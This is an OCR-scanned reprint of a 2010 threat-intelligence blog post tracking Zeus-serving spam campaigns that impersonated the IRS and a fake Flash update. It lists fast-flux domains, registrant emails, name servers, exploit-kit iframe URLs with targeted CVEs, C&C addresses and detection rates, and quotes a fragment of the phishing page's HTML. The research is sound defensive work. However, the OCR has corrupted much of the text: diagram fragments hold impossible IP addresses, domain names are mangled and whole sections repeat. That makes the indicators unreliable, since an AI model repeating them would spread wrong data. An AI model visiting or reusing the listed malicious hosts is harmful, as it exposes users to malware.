saqwz.co.kr - Email: CamercO5@yahoo.com 
saqwz.kr - Email: CamercO5@yahoo.com 
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89.238.165.195 ——__—_“EL_» 9.236.128.0119 ——‘i-g 4s33970 


saqwz.ne.kr - Email: CamercO5@yahoo.com 
saqwz.or.kr - Email: CamercO5@yahoo.com 


As anticipated, the botnet masters behind the systematically rotated campaigns dissected in 
previous posts, kick off the week with multiple campaigns parked on the newly introduced 
fast-fluxed domains. 


168.122.176.229 ———YEL-ge 168.122.128.017 ——“2——_ asi11 
: 173.96.41.174 ———NEL_-ge 173.68.0.017 ——42-——-> si0796 
a 174.101.244.183 ———MEl_ge 174.101.128.017 ——“S——g» as12262 
: 64.93.112.254 ———MEL ge 64.93.112.0/22 ——42-—_—-> AS39939 

68.41.99.225 ———_MEL_ 639.400.0715 ———4S__» 533668 
4, 69.140.2750 ——“ilL__-ge 69,140.0.016 ——“2-——-> 4533657 
4 71.58.22213 ——__-_HEL ge 7158.16.020 ———Al—_—->_ 4533287 

24.12.1179 ———“El__e 24.12.0.0/14 - 

~ B 4599491 

A _ i 

986.214.105.228 ——_WEL gs 99.212.0.014 
A 

72.24.192.183 ———“ElL_g» 72.24.192.024 ——“S——_m as11492 
A ner . A 
; 74.65.24.97 74.65.0.0/18 ———Hi—__-pe AS11351 
A 76.97.5752 ————“EL_» 76.97.0.016 


s 
AS7725 
A 


76.114.75.44 ——M igs 756.114.646.018 


97.90.184.126 ———HEL_-g® 97.90.128.018 ——4“A2_—_m> 20115 
ns 
» 98.24,.205,225 ——Wil ge 99,240.15 ———Ai——-m> as11426 
NS nsl skcrealestate net A 
"> 99.238.165195 ——YEL ge 299.238.128.018 —AS-ge as33970 
_ a 
nN ns] addressway.net 
ur ns2.addresswaynet ——4-_—-je 143.99.79.23 ——_—-#EL rl, sy 
ns2.skerealestatenet ——4—-ge 32.179.156.98 ——“S2ge 32179.128.019 ——“S-g as20057 


orkr 


In a typical multitasking fashion, two campaigns are currently active on different sub 
domains introduced at the typosquatted fast-flux ones, impersonating the U.S IRS with 
"Unreported/Underreported Income (Fraud Application) theme", as well as a variation of the 
[9]already profiled PhotoArchive campaign, using a well known "[10]You don’t have the latest 
version of Macromedia Flash Player" error message. 
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You don't have the latest version of Macromedia Flash Player 


This site maies use of Nacromeaa® Fissh(TU) sco@ware Youve mataiied a e lacromeda Flash Player that cannot play the content we 


9 
VW Rate 


Let’s dissect both campaigns, sharing the same fast-flux infrastructure, and currently 
spammed in the wild. 


Sample campaign URLs from the PhotoArchive, SecretArchives themed campaign: 
- archive .repok.or.kr/archive0714/?id=test@test.com 

- secretarchives .renyn.kr/archive0714/?id=test@test.com 

- secretfiles .repolit.me.uk/archive0714/?id=test@test.com 

- secretarchives .renyn.ne.kr/archive0714/?id=test@test.com 

- postcards .repolix.co.uk/archive0714/?id=test@test.com 


Sample sub domain structure: 
anonymousfiles .repoli2.me.uk 
archive .repoliq.me.uk 
archive .repolit.me.uk 
archives .repolil.me.uk 
filearchive .repolil.me.uk 
files .repolit.me.uk 

files .repolix.me.uk 
files4friends .repolit.me.uk 
secretarchives .repoliq.me.uk 
secretarchives .repoliw.me.uk 
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secretarchives .repolix.me.uk 
secretfiles .repoliq.me.uk 
sendspace .repoli2.me.uk 


archive .repolix.co.uk 
archives .repoliq.co.uk 
archives .repolix.co.uk 

files .repoliq.co.uk 
files4friends .repolix.co.uk 
incognito .repoliq.co.uk 
postcard .repoliq.co.uk 
postcard .repoliw.co.uk 
secretarchives .repoliw.co.uk 
www.irs.gov .repolix.co.uk 


Embedded iFrame - 91.201.196.101 /ukasp/in.php (AS42229 (MARIAM-AS PP Mariam) 
attempts to exploit [11]CVE-2007-5659; [12]CVE-2008-2992; [13]CVE-2008-0015; [14]CVE- 
2009-0927 and [15]CVE-2009-4324. Upon successful exploitation, file.exe - [16]Trojan- 
Spy.Win32.Zbot.gen - Result: 12/41 (29.27 %) is served. Just like the original update.exe - 
[17]Trojan.Zbot - Result: 13/40 (32.50 %) available as a manual download from the pages, 
both [18]samples phone back to the well known elnasa.ru /asd/elnasa.ble - 109.95.114.71 - 
Email: kievsk@yandex.ru - [19]Aleksey V Kijanskiy. 


Naturally, [20]AS42229 (MARIAM-AS PP Mariam) is a cybercrime-friendly AS, with the fol- 
lowing currently active Zeus C &Cs parked there: 

91.201.196.35 

91.201.196.75 

91.201.196.76 

91.201.196.38 

91.201.196.34 

91.201.196.37 


Sample URL from the IRS-themed campaign: 
- irs.gov .renyn.kr/fraud.applications/application/statement.php 


Sample iFrame from the IRS-themed campaign - 109.95.114.251 /usa50/in.php is cur- 
rently down. The same IP was used to serve client-side exploits in a previous campaign - 
"[21]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams". 


Detection rate for tax-statement.exe - [22]Trojan-Spy.Win32.Zbot.gen - Result: 37/41 (90.25 


%), [23]which upon execution phones [24]back to the well Known nekovo.ru /cbd/ nekovo.br - 
109.95.115.18 - Email: kievsk@yandex.ru - Aleksey V Kijanskiy 
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< 85.229.15.95 ——ME gs 95.224.0.013 ———__—“h--» aszii9 
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A 
N 
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ns1 noldingloryeom 


me.uk 


Active and spamvertised fast-fluxed domains part of the campaign: 
renya.co.kr - Email: Sethdc77@yahoo.co.uk 
renya.kr - Email: Sethdc77@yahoo.co.uk 
renya.ne.kr - Email: Sethdc77@yahoo.co.uk 
renya.or.kr - Email: Sethdc77@yahoo.co.uk 
renyn.kr - Email: Sethdc77@yahoo.co.uk 
renyn.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyn.or.kr - Email: Sethdc77@yahoo.co.uk 
renyo.co.kr - Email: Sethdc77@yahoo.co.uk 
renyo.kr - Email: Sethdc77@yahoo.co.uk 
renyo.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyo.orkr - Email: Sethdc77@yahoo.co.uk 
renyx.co.kr - Email: Sethdc77@yahoo.co.uk 
renyx.kr - Email: Sethdc77@yahoo.co.uk 
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renyx.ne.kr - Email: Sethdc7 7@yahoo.co.uk 
renyx.orkr - Email: Sethdc77@yahoo.co.uk 


rep021.co.kr - Email: DRendell3407@hotmail.com 
rep021.kr - Email: DRendell3407@hotmail.com 
rep021.ne.kr - Email: DRendell3407@hotmail.com 
rep021.ornkr - Email: DRendell3407@hotmail.com 
rep022.co.kr - Email: DRendell3407@hotmail.com 
rep022.kr - Email: DRendell3407@hotmail.com 
rep022.ne.kr - Email: DRendell3407@hotmail.com 
rep022.onkr - Email: DRendell3407@hotmail.com 
rep023.co.kr - Email: DRendell3407@hotmail.com 
rep023.kr - Email: DRendell3407@hotmail.com 
rep023.onkr - Email: DRendell3407@hotmail.com 
rep024.kr - Email: DRendell3407@hotmail.com 
rep071.co.kr - Email: KantuM37690@hotmail.com 
rep071.kr - Email: KantuM37690@hotmail.com 
rep071.ne.kr - Email: KantuM37690@hotmail.com 
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rep071.orkr - Email: KantuM37690@hotmail.com 
rep072.co.kr - Email: KantuM37690@hotmail.com 
rep072.kr - Email: KantuM37690@hotmail.com 
rep072.ne.kr - Email: KantuM37690@hotmail.com 
rep072.orkr - Email: KantuM37690@hotmail.com 
rep073.co.kr - Email: KantuM37690@hotmail.com 
rep073.kr - Email: KantuM37690@hotmail.com 
rep073.ne.kr - Email: KantuM37690@hotmail.com 
rep073.orkr - Email: KantuM37690@hotmail.com 
rep074.co.kr - Email: KantuM37690@hotmail.com 
rep074.ne.kr - Email: KantuM37690@hotmail.com 
rep074.orkr - Email: KantuM37690@hotmail.com 
rep1051.co.uk 

rep1051.me.uk 

rep1051.org.uk 

rep1051.uk.com 

repak.co.kr - Email: limhomeslm@yahoo.co.uk 
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repak.kr - Email: limhomeslm@yahoo.co.uk 


repak.ne.kr - Email: limhomeslm@yahoo.co.uk 
repak.orkr - Email: limhomeslm@yahoo.co.uk 
repaz.co.kr - Email: Olo55768@yahoo.co.uk 
repaz.kr - Email: Olob55768@yahoo.co.uk 
repaz.or.kr - Email: Olo55768@yahoo.co.uk 
repek.co.kr - Email: limhomeslm@yahoo.co.uk 
repek.ne.kr - Email: limhomeslm@yahoo.co.uk 
repek.orkr - Email: limhomeslm@yahoo.co.uk 
repey.co.kr - Email: Olob55768@yahoo.co.uk 
repey.kr - Email: Olb55768@yahoo.co.uk 
repey.ne.kr - Email: Olo55768@yahoo.co.uk 
repey.onkr - Email: Olb55768@yahoo.co.uk 
repia.co.kr - Email: Olb55768@yahoo.co.uk 
repia.kr - Email: Olb55768@yahoo.co.uk 
repia.ne.kr - Email: Olo55768@yahoo.co.uk 
repia.onkr - Email: Olb55768@yahoo.co.uk 
repik.co.kr - Email: limhomeslm@yahoo.co.uk 
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repik.kr - Email: limhomeslm@yahoo.co.uk 
repik.or.kr - Email: limhomeslm@yahoo.co.uk 
repok.co.kr - Email: limhomeslm@yahoo.co.uk 
repok.kr - Email: limhomeslm@yahoo.co.uk 
repok.ne.kr - Email: limhomeslm@yahoo.co.uk 
repok.orkr - Email: limhomeslm@yahoo.co.uk 
repoy.co.kr - Email: Olb55768@yahoo.co.uk 
repoy.kr - Email: Olb55768@yahoo.co.uk 
repoy.ne.kr - Email: Olob55768@yahoo.co.uk 
repoy.or.kr - Email: Olb55768@yahoo.co.uk 
repolil.co.uk 

repolil.me.uk 

repoli2.co.uk 

repoli2.me.uk 
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repoli3.co.uk 
repolie.co.uk 
repolio.co.uk 
repoliq.co.uk 
repoliq.me.uk 
repolit.me.uk 
repoliw.co.uk 
repoliw.me.uk 
repolix.co.uk 
repolix.me.uk 


Name servers of notice: 

ns1 .skcrealestate.net - 89.238.165.195 - Email: support@skrealty.net 
nsl1 .addressway.net - 89.238.165.195 - Email: poolbill@hotmail.com 
nsl .skcpanel.com - 64.20.42.235 - Email: support@sk.com 

ns1 .holdinglory.com - 64.20.42.235 - Email: greysy@gmx.com 

nsl1 .skcres.com - 64.20.42.235 - Email: hr@skc.net 

nsl .x-videocovers.net - 64.20.42.235 - Email: storylink@live.com 


Interestingly, researchers from [25]M86 Security gained access to the web malware ex- 
ploitation kit used in a previous campaign: 


"It has been up and running and serving exploits for nearly a day. In this time almost 
40,000 unique users have been exposed to these exploits, and the Zeus file has 
been downloaded over 5000 times. These downloads do not include the PhotoArchive.exe 
file downloads that a user may be tricked into downloading and executing themselves." 


Updated will be posted as soon as new developments emerge. 


Related coverage of the gang’s previous campaigns: 

[26]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[27]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[28]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits 
[29]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 

[30]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 

[31]Pushdo Injecting Bogus Swine Flu Vaccine 

[32]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 

[33]Ongoing FDIC Soam Campaign Serves Zeus Crimeware 

[34]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [35]Dancho Danchev’s blog. Follow him [36]on Twitter. 


1. ttp://www.virustotal.com/analisis/ef120bf9f7791f 0acefb05d4628d2c2d87999938f db9f 3152142436bc321ec05- 12666 


Q 
9 8 


2. ttp://www.virustotal.com/analisis/ea81a121b75fe8ad2e445cd13a6350850de2bf 21cdb6d1dc4eac247b2aac3a40- 1266 
3. ttp://www.virustotal.com/analisis/1983abeb8001365952f e06814ab6a676acebacObicbf4f3d2030de424b0de130- 12666 


4. ttp://www.virustotal.com/analisis/f4d19dca77a571b73eae1f0c3640db81cc257472f 1cc9e3f 1ca0376216df£4a91- 12666 
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5. ttp://www.virustotal.com/analisis/de54327ae5b208f 1£45704d41ef 03c02758f 7£12c2£63907db70429629c44df 3- 12666 


://cve.mitre 
mitre. 
mitre. 
mitre. 


mitre. 


17. bttp://www.virustotal.com/analisis/3aaa85a66689a9c09243127b0831e7294b3db191ce0c3e81ebc871fe843506f c- 12662 


. http: //ddanchev.blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


19. http://ddanchev.blogspot .com/2010/01/outlook-web-access-themed-spam- campaign. htm 
20. https://zeustracker.abuse.ch/monitor .php?as=42229 


21. http://ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


22. 
23. 

24. 

25, 

26. 

27. 

28. 


29. 
30. 
31. 
32. 
33. 


34. http: //ddanchev. blogspot .com/2009/07/multitasking-fast-flux-botnet-that .htm 
35. http://ddanchev.blogspot.com/ 
36. http://twitter.com/danchodanche 
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6.2.15 IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the 
Wild (2010-02-15 23:34) 


Khiml> cheed. 
meta Wttp-equiy="Content-Type” content="cext/html: charset+I 
Link rel="stylesheet” type*"text/cas” href*"thene.czs” 


title>You don't have the latest version of Macromedia Flash Player</title 
</head><bedy Leftmargin="0" tegpmargin="0" marginheight«"0O" margirmridth="0"> 
http: //92.203.196.101/ukasp/is.p 


img arc*"specer.git” border*"O" height+"25" widthe":0" 


SECOND UPDATE for Wednesday, February 24, 2010 - Another portfolio of new domains 
is being spamvertised, using the old PhotoArchive theme. The client-side exploits serving 
iFrame directory has been changed to 91.201.196.101 /usasp33/in.php currently serving 
CVE-2007-5659; CVE-2008-2992; CVE-2008-0015; CVE-2009-0927 and CVE-2009-4324. 


Sample detection rates: update.exe - [1]Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81 %); 
file.exe - [2]Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81 %). Samples phone back to the 
same C &C where samples from previous campaigns were also phoning back to - trollarnru 
/cnf/tri.jpg - 109.95.114.133 - Email: bernardo _pr@inbox.ru. 


Domains portfolio: 

reda.kr - Email: ClarenceN62412@hotmail.com 
redb.kr - Email: ClarenceN62412@hotmail.com 
reda.ne.kr - Email: ClarenceN62412@hotmail.com 
redb.ne.kr - Email: ClarenceN62412@hotmail.com 
redn.ne.kr - Email: ClarenceN62412@hotmail.com 
redv.ne.kr - Email: ClarenceN62412@hotmail.com 
redn.kr - Email: ClarenceN62412@hotmail.com 
reda.co.kr - Email: ClarenceN62412@hotmail.com 
redv.co.kr - Email: ClarenceN62412@hotmail.com 
reda.or.kr - Email: ClarenceN62412@hotmail.com 
redb.onkr - Email: ClarenceN62412@hotmail.com 
redn.onkr - Email: ClarenceN62412@hotmail.com 
redv.orkr - Email: ClarenceN62412@hotmail.com 
redv.kr - Email: ClarenceN62412@hotmail.com 


Name server of notice: 
ns1.skcstaffing.com - 87.117.245.9 - Email: hr@department.com 


UPDATED: Wednesday, February 24, 2010 - Another portfolio of typosquatted domains 
has been spamvertised. The already suspended domains are listed for historical OSINT 
analysis of this gang’s activities. 
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Interestingly, their campaigns are lacking the quality assurance I’m used to see. For instance, 
the iFrame IP (109.95.114.251 /usa50/in.php) is currently down, with the malware itself, includ- 
ing the one that would have been dropped given the exploitation took place - have over 90 % 
detectio rate, since the binaries were first analyzed a month ago - tax-statement.exe - [3] Trojan- 
Spy.Win32.Zbot - 40/42 (95.24 %); abs.exe - [4]Packed:W32/Mufanom.A - Result: 38/42 (90.48 
%). The directory structure also remains the same - irs.gov.yrxc.kr/fraud.applications /appli- 
cation/statement.php 


em 
ya Internal Revenue Service 


FID: 
Tax Type: INCOME TAX 
Issue: UnreportediUnderreportec Income (Fraud Application) 


Fitng and paying your Sederal taes Correctty and on time is an important part of ving and 


la seatement taxpayes i) exe 
If the statement is mcorrect, Contact cur Taxpayer Advocate Sermice. 


RS Prreace P otecy 


Domains portfolio, including name servers of notice are as follows: 
erdca.co.kr - Email: WeedDame16427@hotmail.com 
erdca.kr - Email: WeedDame16427@hotmail.com 
erdca.ne.kr - Email: WeedDame16427@hotmail.com 
erdca.or.kr - Email: WeedDame16427@hotmail.com 
erdcb.kr - Email: WeedDame16427@hotmail.com 
erdcd.kr - Email: WeedDame16427@hotmail.com 
erdce.co.kr - Email: WeedDame16427@hotmail.com 
erdce.kr - Email: WeedDame16427@hotmail.com 
erdce.ne.kr - Email: WeedDame16427@hotmail.com 
erdce.or.kr - Email: WeedDame16427@hotmail.com 
erdcq.kr - Email: WeedDame16427@hotmail.com 
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erdcu.co.kr - Email: WeedDame16427@hotmail.com 
erdcu.kr - Email: WeedDame16427@hotmail.com 
erdcu.ne.kr - Email: WeedDame16427@hotmail.com 
erdcu.or.kr - Email: WeedDame16427@hotmail.com 
yrxc.co.kr - Email: WeedDame16427@hotmail.com 
yrxc.kr - Email: WeedDame16427@hotmail.com 
yrxc.orkr - Email: WeedDame16427@hotmail.com 
yrxo.co.kr - Email: WeedDame16427@hotmail.com 
yrxo.kr - Email: WeedDame16427@hotmail.com 
yrxo.ne.kr - Email: WeedDame16427@hotmail.com 
yrxo.orkr - Email: WeedDame16427@hotmail.com 
yrxs.co.kr - Email: WeedDame16427@hotmail.com 
yrxs.kr - Email: WeedDame16427@hotmail.com 
yrxs.ne.kr - Email: WeedDame16427@hotmail.com 
yrxs.ornkr - Email: WeedDame16427@hotmail.com 


rtsle3en.me.uk 
rtsle3eq.me.uk 
rtsle3ew.me.uk 
rtsle3ex.me.uk 
rtsle3ey.me.uk 
rtsle3ez.me.uk 
rtsle3eb.co.uk 
rtsle3en.co.uk 
rtsle3eq.co.uk 
rtsle3er.co.uk 
rtsle3ew.co.uk 
rtsle3ex.co.uk 
rtsle3ey.co.uk 
rtsle3ez.co.uk 


Name servers of notice: 
ns1.skc-realty.com - 89.238.165.195 - Email: skc@realty.net 
ns1.chinafromasia.com 


UPDATED: Monday, February 22, 2010 - Another typosquatted domains portfolio is being 


spamvertised, including two new name servers, parked on the same IP where name servers 
from previous Campaigns were hosted. 
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Typosquatted domains, and name servers of notice are as follows: 
dese.co.kr - Email: asondrapgt@hotmail.com 
dese.kr - Email: asondrapgt@hotmail.com 
dese.ne.kr - Email: asondrapgt@hotmail.com 
dese.or.kr - Email: asondrapgt@hotmail.com 
desr.co.kr - Email: asondrapgt@hotmail.com 
desr.kr - Email: asondrapgt@hotmail.com 
desr.or.kr - Email: asondrapgt@hotmail.com 
desv.co.kr - Email: asondrapgt@hotmail.com 
desv.kr - Email: asondrapgt@hotmail.com 
desv.ne.kr - Email: asondrapgt@hotmail.com 
desv.or.kr - Email: asondrapgt@hotmail.com 
desx.co.kr - Email: asondrapgt@hotmail.com 
desx.kr - Email: asondrapgt@hotmail.com 
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desx.ne.kr - Email: asondrapgt@hotmail.com 
desx.orkr - Email: asondrapgt@hotmail.com 
edasa.co.kr 

edasa.kr 

edasa.ne.kr 

edasa.or.kr 

edase.co.kr 

edase.kr 

edase.ne.kr 

edase.or.kr 

edasn.kr 

edasn.ne.kr 

edasn.orkr 

edasq.co.kr 

edasq.kr 

edasq.ne.kr 

edasq.or.kr 


Name servers of notice: 
ns1.silverbrend.net - 87.117.245.9 - Email: klincz@aol.com 
nsl1.hourscanine.com - 87.117.245.9 - Email: carruawau@gmail.com 


UPDATED: Sunday, February 21, 2010 - The gang is currently spamming a phishing cam- 
paign - no client-side serving iFrames found so far - attempting to steal Google account and 
Blogspot accounting data. Given the fact that the gang is capable of generating hundreds of 
thousands of bogus accounts on their own, as well as buy them in bulk orders from vendors 
that have already built such an inventory across multiple social networking sites, the only 
logical reason for attempting to phish for such data would be to attempt to maliciously 
monetize the traffic of legitimate blogs. 
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& Blogger 


Home | Help | Terms of Service | Privacy 


Sign in te Blogger with your 
© Google Account 
C Blogger username 


Emaa/Btogger usemame [ 


The newly spamvertised domains, including a new name Server are as follows: 


esub.co.kr - Email: osamplerl61@hotmail.com 
esub.kr - Email: osamplerl61@hotmail.com 
esub.ne.kr - Email: osamplerl61@hotmail.com 
esug.co.kr - Email: osamplerl61@hotmail.com 
esug.kr - Email: osamplerl61@hotmail.com 
esug.ne.kr - Email: osamplerl61@hotmail.com 
esuk.kr - Email: osamplerl61@hotmail.com 
esuk.ne.kr - Email: osamplerl61@hotmail.com 
esuk.or.kr - Email: osamplerl61@hotmail.com 
esus.co.kr - Email: osamplerl61@hotmail.com 
esus.kr - Email: osamplerl61@hotmail.com 
esus.ne.kr - Email: osamplerl61@hotmail.com 
esut.co.kr - Email: osamplerl61@hotmail.com 
esut.kr - Email: osamplerl61@hotmail.com 
esut.ne.kr - Email: osamplerl61@hotmail.com 


ns1.nitroexcel.com - 89.238.165.195 (the same IP was also hosting the name server domains 


from previous Campaigns) - Email: rackmodule@writemail.com 


UPDATED: Saturday, February 20, 2010 - The client-side exploit serving iFrame directory 
has been changed to 91.201.196.101 /usasp11/in.php, with another typosquatted portfolio of 
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domains currently being spamvertised. 


Detection rates: update.exe - [5]Trojan.Zbot - Result: 25/40 (62.5 %) (phones back to 
trollar.ru /cnf/tri.jpg - 109.95.114.133 - Email: bernardo _pr@inbox.ru); file.exe - [6]Tro- 
jan.Spy.ZBot.12544.1 - Result: 26/41 (63.42 %); ie.js - [7]JS:CVE-2008-0015-G - Result: 14/40 
(35 %); ie2.js - [8]Exploit:J/S/CVE-2008-0015 - Result: 17/40 (42.5 %); nowTrue.swf - [9]Tro- 
jan.SWF.Dropper.E - Result: 24/41 (58.54 %); pdf.pdf - [LO]JExploit.JS.Pdfka.bIn - Result: 11/41 
(26.83 %); swf.swf - [11]SWF/Exploit.Agent.BS - Result: 8/40 (20 %). 
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Domain portfolio, name server of notice - nsl.vektoroils.net - 74.117.63.218 - Email: ad- 
min@forsyte.info : 

desa.co.kr - Email: hjfeasey@yahoo.co.uk 

desa.kr - Email: hjfeasey@yahoo.co.uk 

desa.ne.kr - Email: hjfeasey@yahoo.co.uk 

desa.or.kr - Email: hjfeasey@yahoo.co.uk 
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desb.co.kr - Email: hjfeasey@yahoo.co.uk 
desb.kr - Email: hjfeasey@yahoo.co.uk 
desb.ne.kr - Email: hjfeasey@yahoo.co.uk 
desb.or.kr - Email: hjfeasey@yahoo.co.uk 
deso.kr - Email: hjfeasey@yahoo.co.uk 
deso.or.kr - Email: hjfeasey@yahoo.co.uk 
desv.kr - Email: hjfeasey@yahoo.co.uk 
desz.co.kr - Email: hjfeasey@yahoo.co.uk 
desz.kr - Email: hjfeasey@yahoo.co.uk 
desz.ne.kr - Email: hjfeasey@yahoo.co.uk 
desz.or.kr - Email: hjfeasey@yahoo.co.uk 


UPDATED: Wednesday, February 17, 2010 - The iFrame directory has been changed to 


91.201.196.101 /usasp/in.php, detection rate for update.exe - [12]Trojan-Spy.Win32.Zbot.gen 
- Result: 17/40 (42.5 %). 
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Currently active and spamvertised domains include: 
saqwk.co.kr - Email: CamercO5@yahoo.com 
saqwk.kr - Email: CamercO5@yahoo.com 
saqwk.ne.kr - Email: CamercO5@yahoo.com 
saqwk.or.kr - Email: CamercO5@yahoo.com 
saqwm.co.kr - Email: CamercO5@yahoo.com 
saqwm.kr - Email: CamercO5@yahoo.com 
saqwm.ne.kr - Email: CamercO5@yahoo.com 
saqwq.co.kr - Email: CamercO5@yahoo.com 
saqwq.kr - Email: CamercO5@yahoo.com 
saqwq.ne.kr - Email: CamercO5@yahoo.com 
saqwq.onkr - Email: CamercO5@yahoo.com 
saqwz.co.kr - Email: CamercO5@yahoo.com 
saqwz.kr - Email: CamercO5@yahoo.com 
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saqwz.ne.kr - Email: CamercO5@yahoo.com 
saqwz.or.kr - Email: CamercO5@yahoo.com 


As anticipated, the botnet masters behind the systematically rotated campaigns dissected in 
previous posts, kick off the week with multiple campaigns parked on the newly introduced 
fast-fluxed domains. 
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In a typical multitasking fashion, two campaigns are currently active on different sub 
domains introduced at the typosquatted fast-flux ones, impersonating the U.S IRS with 
"Unreported/Underreported Income (Fraud Application) theme", as well as a variation of the 
[13]already profiled PhotoArchive campaign, using a well known "[14]You don’t have the latest 
version of Macromedia Flash Player" error message. 
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You don't have the latest version of Macromedia Flash Player 


This site makes use of Macromeda® Flash(Té) sofware You've nstalied a e Jacromeda Flash Player that cannot play the content we've created 


— 
Raia 


Let’s dissect both campaigns, sharing the same fast-flux infrastructure, and currently 
spammed in the wild. 


Sample campaign URLs from the PhotoArchive, SecretArchives themed campaign: 
- archive .repok.or.kr/archive0714/?id=test@test.com 

- secretarchives .renyn.kr/archive0714/?id=test@test.com 

- secretfiles .repolit.me.uk/archive0714/?id=test@test.com 

- secretarchives .renyn.ne.kr/archive0714/?id=test@test.com 

- postcards .repolix.co.uk/archive0714/?id=test@test.com 


Sample sub domain structure: 
anonymousfiles .repoli2.me.uk 
archive .repoliq.me.uk 
archive .repolit.me.uk 
archives .repolil.me.uk 
filearchive .repolil.me.uk 
files .repolit.me.uk 

files .repolix.me.uk 
files4friends .repolit.me.uk 
secretarchives .repoliq.me.uk 
secretarchives .repoliw.me.uk 
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secretarchives .repolix.me.uk 
secretfiles .repoliq.me.uk 
sendspace .repoli2.me.uk 


archive .repolix.co.uk 
archives .repoliq.co.uk 
archives .repolix.co.uk 

files .repoliq.co.uk 
files4friends .repolix.co.uk 
incognito .repoliq.co.uk 
postcard .repoliq.co.uk 
postcard .repoliw.co.uk 
secretarchives .repoliw.co.uk 
www.irs.gov .repolix.co.uk 


Embedded iFrame - 91.201.196.101 /ukasp/in.php (AS42229 (MARIAM-AS PP Mariam) 
attempts to exploit [15]CVE-2007-5659; [16]CVE-2008-2992; [17]CVE-2008-0015; [18]CVE- 
2009-0927 and [19]CVE-2009-4324. Upon successful exploitation, file.exe - [20]Trojan- 
Spy.Win32.Zbot.gen - Result: 12/41 (29.27 %) is served. Just like the original update.exe - 
[21]Trojan.Zbot - Result: 13/40 (32.50 %) available as a manual download from the pages, 
both [22]samples phone back to the well known elnasa.ru /asd/elnasa.ble - 109.95.114.71 - 
Email: kievsk@yandex.ru - [23]Aleksey V Kijanskiy. 


Naturally, [24]AS42229 (MARIAM-AS PP Mariam) is a cybercrime-friendly AS, with the fol- 
lowing currently active Zeus C &Cs parked there: 

91.201.196.35 

91.201.196.75 

91.201.196.76 

91.201.196.38 

91.201.196.34 

91.201.196.37 


Sample URL from the IRS-themed campaign: 
- irs.gov .renyn.kr/fraud.applications/application/statement.php 


Sample iFrame from the IRS-themed campaign - 109.95.114.251 /usa50/in.php is cur- 
rently down. The same IP was used to serve client-side exploits in a previous campaign - 
"[25]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams". 


Detection rate for tax-statement.exe - [26]Trojan-Spy.Win32.Zbot.gen - Result: 37/41 (90.25 


%), [27]which upon execution phones [28]back to the well known nekovo.ru /cbd/ nekovo.br - 
109.95.115.18 - Email: kievsk@yandex.ru - Aleksey V Kijanskiy 
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Active and spamvertised fast-fluxed domains part of the campaign: 
renya.co.kr - Email: Sethdc77@yahoo.co.uk 
renya.kr - Email: Sethdc77@yahoo.co.uk 
renya.ne.kr - Email: Sethdc77@yahoo.co.uk 
renya.onkr - Email: Sethdc77@yahoo.co.uk 
renyn.kr - Email: Sethdc77@yahoo.co.uk 
renyn.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyn.orkr - Email: Sethdc77@yahoo.co.uk 
renyo.co.kr - Email: Sethdc77@yahoo.co.uk 
renyo.kr - Email: Sethdc77@yahoo.co.uk 
renyo.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyo.orkr - Email: Sethdc77@yahoo.co.uk 
renyx.co.kr - Email: Sethdc77@yahoo.co.uk 
renyx.kr - Email: Sethdc77@yahoo.co.uk 
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renyx.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyx.or.kr - Email: Sethdc77@yahoo.co.uk 


rep021.co.kr - Email: DRendell3407@hotmail.com 
rep021.kr - Email: DRendell3407@hotmail.com 
rep021.ne.kr - Email: DRendell3407@hotmail.com 
rep021.orkr - Email: DRendell3407@hotmail.com 
rep022.co.kr - Email: DRendell3407@hotmail.com 
rep022.kr - Email: DRendell3407@hotmail.com 
rep022.ne.kr - Email: DRendell3407@hotmail.com 
rep022.orkr - Email: DRendell3407@hotmail.com 
rep023.co.kr - Email: DRendell3407@hotmail.com 
rep023.kr - Email: DRendell3407@hotmail.com 
rep023.orkr - Email: DRendell3407@hotmail.com 
rep024.kr - Email: DRendell3407@hotmail.com 
rep071.co.kr - Email: KantuM37690@hotmail.com 
rep071.kr - Email: KantuM37690@hotmail.com 
rep071.ne.kr - Email: KantuM37690@hotmail.com 
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us 09.74.61138 ——__Mfl__sg 939.720.0113 ——_—__‘L____» 459141 
mu nsl addresswaynet a 


u nsl skcreatestate net 


orkr 


rep0O71.ornkr - Email: KantuM37690@hotmail.com 
rep072.co.kr - Email: KantuM37690@hotmail.com 
rep072.kr - Email: KantuM37690@hotmail.com 
rep072.ne.kr - Email: KantuM37690@hotmail.com 
rep072.onkr - Email: KantuM37690@hotmail.com 
rep073.co.kr - Email: KantuM37690@hotmail.com 
rep073.kr - Email: KantuM37690@hotmail.com 
rep073.ne.kr - Email: KantuM37690@hotmail.com 
rep073.orkr - Email: KantuM37690@hotmail.com 
rep074.co.kr - Email: KantuM37690@hotmail.com 
rep074.ne.kr - Email: KantuM37690@hotmail.com 
rep074.orkr - Email: KantuM37690@hotmail.com 
rep1051.co.uk 

rep1051.me.uk 

rep1051.org.uk 

rep1051.uk.com 

repak.co.kr - Email: limhomeslm@yahoo.co.uk 


i - 89.238.165.195 — ME gy 99 238.128.018 tinge AS33970 


ns2.shereatestate. net) ————A es 992.179.156.998 ——_—_—_—______—_“il _ 32179.128.018 —“-g 4520057 
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repak.kr - Email: limhomeslm@yahoo.co.uk 


repak.ne.kr - Email: limhomeslm@yahoo.co.uk 
repak.orkr - Email: limhomeslm@yahoo.co.uk 
repaz.co.kr - Email: Olb55768@yahoo.co.uk 
repaz.kr - Email: Olb55768@yahoo.co.uk 
repaz.ornkr - Email: Olob55768@yahoo.co.uk 
repek.co.kr - Email: limhomeslm@yahoo.co.uk 
